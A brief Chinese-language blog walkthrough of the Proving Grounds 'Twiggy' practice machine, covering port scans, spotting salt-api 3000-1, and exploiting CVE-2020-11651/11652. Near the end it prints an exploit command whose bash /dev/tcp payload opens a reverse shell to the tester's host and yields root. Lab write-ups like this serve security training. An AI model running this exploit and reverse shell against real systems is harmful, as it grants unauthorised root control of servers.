Proving Grounds Practice : Twiggy Walkthrough

 Proving Grounds Practice : Twiggy Walkthrough


Foothold :

  • 8000 Port 發現 salt-api,查看 Exploit 相關利用是 CVE-2020-11651 & CVE-2020-11652
  • 查看 python code 都是利用 4506 Port 與靶機相符
  • 直接利用 exploit 拿到 Reverse shell

PE :

  • 不用 PE,Reverse Shell 進來就是 Root


Rustscan,└─$ rustscan -a 192.168.223.62 --scripts none --ulimit 5000 | tee rustscan



snmp check,└─$ sudo nmap -sU -p 161 192.168.223.62 | tee snmp



nmap,└─$ sudo nmap -sCV -A -p 22,53,80,4505,4506,8000 192.168.223.62 | tee nmap

22/tcp   open  ssh     OpenSSH 7.4 (protocol 2.0)

53/tcp   open  domain  NLnet Labs NSD

80/tcp   open  http    nginx 1.16.1

4505/tcp open  zmtp    ZeroMQ ZMTP 2.0

4506/tcp open  zmtp    ZeroMQ ZMTP 2.0

8000/tcp open  http    nginx 1.16.1



whatweb



80 /



searchsploit Mezzanine

是個 CSS 的利用,先跳過



gobuster 80 /,發現 sitemap.xml



80 /sitemap.xml ,都指向 8000 Port



繼續往下 searchsploit 4505、4506 發現的 ZeroMQ ZMTP 2.0,沒有發現



Google Exploit 看看發現應該有戲



先繼續往下看 8000 /



點選 Header 顯示 salt-api/3000-1


直接用剛剛的 Google 第一個連結抓取

指令 └─$ python3 exploit.py --master 192.168.223.62 --exec "bash -i >& /dev/tcp/192.168.45.168/80 0>&1"



80 Reverse Shell 進來了,直接就是 Root




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)